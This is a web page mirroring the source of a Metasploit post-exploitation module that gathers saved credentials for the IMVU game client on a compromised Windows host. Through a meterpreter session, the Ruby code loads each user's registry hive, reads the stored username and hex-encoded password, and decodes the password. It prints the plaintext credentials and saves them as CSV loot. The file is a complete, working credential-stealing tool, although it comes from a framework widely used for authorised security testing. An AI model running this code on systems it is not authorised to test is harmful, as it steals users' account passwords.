Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/imvu.rb
19535 views
1
# -*- coding: binary -*-

2


3
##

4
# This module requires Metasploit: https://metasploit.com/download

5
# Current source: https://github.com/rapid7/metasploit-framework

6
##

7


8
class MetasploitModule < Msf::Post

9
  include Msf::Post::Windows::Registry

10
  include Msf::Auxiliary::Report

11
  include Msf::Post::Windows::UserProfiles

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Windows Gather Credentials IMVU Game Client',

18
        'Description' => %q{

19
          This module extracts account username & password from the IMVU game client

20
          and stores it as loot.

21
        },

22
        'Author' => [

23
          'Shubham Dawra <shubham2dawra[at]gmail.com>' # www.SecurityXploded.com

24
        ],

25
        'License' => MSF_LICENSE,

26
        'Platform' => [ 'win' ],

27
        'SessionTypes' => [ 'meterpreter' ],

28
        'Notes' => {

29
          'Stability' => [CRASH_SAFE],

30
          'SideEffects' => [],

31
          'Reliability' => []

32
        }

33
      )

34
    )

35
  end

36


37
  def run

38
    fail_with(Failure::BadConfig, 'Only meterpreter sessions are supported by this module') unless session.type == 'meterpreter'

39


40
    creds = Rex::Text::Table.new(

41
      'Header' => 'IMVU Credentials',

42
      'Indent' => 1,

43
      'Columns' => [

44
        'User',

45
        'Password'

46
      ]

47
    )

48


49
    credcount = 0

50
    userhives = load_missing_hives

51
    userhives.each do |hive|

52
      next if hive['HKU'].nil?

53


54
      vprint_status("Looking at Key #{hive['HKU']}")

55
      subkeys = registry_enumkeys("#{hive['HKU']}\\Software\\IMVU\\")

56
      if subkeys.nil? || subkeys.empty?

57
        print_status('IMVU not installed for this user.')

58
        next

59
      end

60
      user = registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\username\\", '')

61
      hpass = registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\password\\", '')

62
      decpass = [ hpass.downcase.gsub(/'/, '').gsub(/\\?x([a-f0-9][a-f0-9])/, '\1') ].pack('H*')

63
      print_good("User=#{user}, Password=#{decpass}")

64
      creds << [user, decpass]

65
      credcount = (credcount + 1)

66
    end

67


68
    # clean up after ourselves

69
    unload_our_hives(userhives)

70
    print_status("#{credcount} Credentials were found.")

71


72
    if credcount > 0

73
      print_status('Storing data...')

74
      path = store_loot(

75
        'imvu.user.creds',

76
        'text/csv',

77
        session,

78
        creds.to_csv,

79
        'imvu_user_creds.csv',

80
        'IMVU User Credentials'

81
      )

82
      print_good("IMVU user credentials saved in: #{path}")

83
    end

84
  end

85
end

86


87